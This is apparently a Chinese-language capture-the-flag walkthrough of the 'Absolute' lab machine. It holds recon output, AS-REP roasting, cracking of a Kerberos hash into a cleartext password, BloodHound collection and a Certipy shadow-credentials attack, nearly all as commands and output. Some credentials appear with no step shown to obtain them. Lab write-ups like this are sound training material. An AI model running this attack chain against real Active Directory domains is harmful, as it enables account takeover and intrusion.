[~] The config file is expected to be at "/root/.rustscan.toml" [~] Automatically increasing ulimit value to 5000. Open 10.10.11.181:53 Open 10.10.11.181:80 Open 10.10.11.181:88 Open 10.10.11.181:135 Open 10.10.11.181:139 Open 10.10.11.181:389 Open 10.10.11.181:445 Open 10.10.11.181:464 Open 10.10.11.181:593 Open 10.10.11.181:636 Open 10.10.11.181:3268 Open 10.10.11.181:3269 Open 10.10.11.181:9389 Open 10.10.11.181:5985 Open 10.10.11.181:47001 Open 10.10.11.181:49664 Open 10.10.11.181:49665 Open 10.10.11.181:49666 Open 10.10.11.181:49667 Open 10.10.11.181:49674 Open 10.10.11.181:49671 Open 10.10.11.181:49675 Open 10.10.11.181:49679 Open 10.10.11.181:49685 Open 10.10.11.181:49703 Open 10.10.11.181:49722
SMB服务
1 2 3 4 5 6 7 8 9
smbclient -L //10.10.11.181 Password for [WORKGROUP\root]: Anonymous login successful
Sharename Type Comment --------- ---- ------- Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.11.181 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available
smb没什么有用的信息
HTTP服务
静态页面,目录扫描也没拥有的结果,将网站轮播的六张图片下载下来查看一下
1
for i in {1..6};do wget http://10.10.11.181/images/hero_$i.jpg;done
exiftool *.jpg | grep Author | awk -F' ' '{print $3" "$4}' > name.txt James Roberts Michael Chaffrey Donald Klay Sarah Osvald Jeffer Robinson Nicole Smith
impacket-GetNPUsers -usersfile users.txt -dc-ip 10.10.11.181 -format john absolute.htb/ Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
...[snip]... [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) $krb5asrep$d.klay@ABSOLUTE.HTB:18530e0c59304e8b5d667ac0cf0efa8a$ed41890599de622a5cf7808aef24c8272c03a5fb62a14b9de3f987e2f9ecc614fe22d44e7eba318ab44152271b84577844980b33e7b78ed0f9b36ebe43b4a6cc5339ecbef110e6325a4acb9d7661b4db47a609eccf7b13c53f9d1aa710a0220102bed90c8b8ee8c8319b9297d811d6c878cd9fca0e24646d82ac6c9d77b9aaf2b40ed8b9ef0c103166c3be1113daa285fca49a2dcba3dbae9d92cafeb6b7774bbd58982eaec5d712f744a281f2317b491555fcc7d58a8ed4c89d435a488b8e7df5c07d181007c5aeb3bd9c3dbb44bf896e9cdfc57509eeea3e7f76ff3d87a87cd7825e1f82e6f8724f9ba348 [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) ...[snip]...
找到一个hash,将其保存至hash文件中,使用john爆破
1 2 3 4 5 6 7 8 9
john hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Darkmoonsky248girl ($krb5asrep$d.klay@ABSOLUTE.HTB) 1g 0:00:00:32 DONE (2025-03-25 03:27) 0.03097g/s 348137p/s 348137c/s 348137C/s DarrenCahppell..DarkAngelNinjaHaku Use the "--show" option to display all of the cracked passwords reliably Session completed.
成功得到一组用户名密码
1 2
username: d.klay password: Darkmoonsky248girl
再探SMB
使用netexec枚举
1 2 3 4 5 6 7 8 9 10 11
netexec winrm 10.10.11.181 -u d.klay -p Darkmoonsky248girl WINRM 10.10.11.181 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:absolute.htb) WINRM 10.10.11.181 5985 DC [-] absolute.htb\d.klay:Darkmoonsky248girl
netexec ldap 10.10.11.181 -u d.klay -p Darkmoonsky248girl SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False) LDAP 10.10.11.181 389 DC [-] absolute.htb\d.klay:Darkmoonsky248girl
netexec smb 10.10.11.181 -u d.klay -p Darkmoonsky248girl SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False) SMB 10.10.11.181 445 DC [-] absolute.htb\d.klay:Darkmoonsky248girl STATUS_ACCOUNT_RESTRICTION
bloodhound-python -ns 10.10.11.181 --dns-tcp -d absolute.htb -u m.lovegod -p AbsoluteLDAP2022! -k -c All --zip INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) INFO: Found AD domain: absolute.htb INFO: Using TGT from cache INFO: Found TGT with correct principal in ccache file. INFO: Connecting to LDAP server: dc.absolute.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc.absolute.htb INFO: Found 18 users INFO: Found 55 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: dc.absolute.htb INFO: Done in 00M 10S INFO: Compressing output into 20250326005117_bloodhound.zip
certipy-ad shadow auto -k -username m.lovegod@absolute.htb -p 'AbsoluteLDAP2022!' -account winrm_user -target dc.absolute.htb -dc-ip 10.10.11.181 Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'winrm_user' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '22e415af-e00b-59e5-9462-693c3948067e' [*] Adding Key Credential with device ID '22e415af-e00b-59e5-9462-693c3948067e' to the Key Credentials for 'winrm_user' [*] Successfully added Key Credential with device ID '22e415af-e00b-59e5-9462-693c3948067e' to the Key Credentials for 'winrm_user' [*] Authenticating as 'winrm_user' with the certificate [*] Using principal: winrm_user@absolute.htb [*] Trying to get TGT... [-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type) [*] Restoring the old Key Credentials for 'winrm_user' [*] Successfully restored the old Key Credentials for 'winrm_user' [*] NT hash for 'winrm_user': None